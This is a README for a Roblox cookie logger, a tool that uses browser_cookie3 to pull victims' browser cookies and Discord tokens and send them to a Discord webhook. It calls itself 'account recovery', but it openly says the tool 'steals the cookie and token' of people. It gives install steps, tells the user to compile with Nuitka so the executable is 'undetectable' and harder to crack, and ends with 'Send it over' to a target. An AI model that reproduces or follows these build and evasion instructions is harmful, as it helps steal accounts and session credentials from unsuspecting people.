
Smooth and quick cookie logger for account recovery.

This will probably become an anti skid which steals the cookie and token of a person that downloaded a leaked copy or leaked it.

Built With

Getting Started

To get a local copy up and running follow these simple steps.


This is an example of how to list things you need to use the software and how to install them.

- Go to the folder with all of the files.
- In the navigation bar (C:/Users/%user%/Desktop/Roblox-Cookie-Logger) delete everything and type cmd, this will bring up "the shell".
- Now install the packages as instructed.


  1. Download the .zip of this repository

    git clone
  2. Install PIP packages

    pip install nuitka
    pip install requests
    pip install browser_cookie3
    pip install discord-webhook


  • Replace your webhook. If you are using the advanced logger, make sure to fill in the webhook for the token logger and the cookie logger which are in diffrent locations.

  • Compile to exe using nuitka PLEASE AND NOT PYINSTALLER. Why?

    1. Harder to crack because Pyinstaller just unloads the source into the temp directory
    2. Undetectable
    3. Faster
    4. Smaller file size that works well when compressed.
  • Nuitka How To

    1. Access the "Shell"
    2. python -m nuitka
  • Send it over.
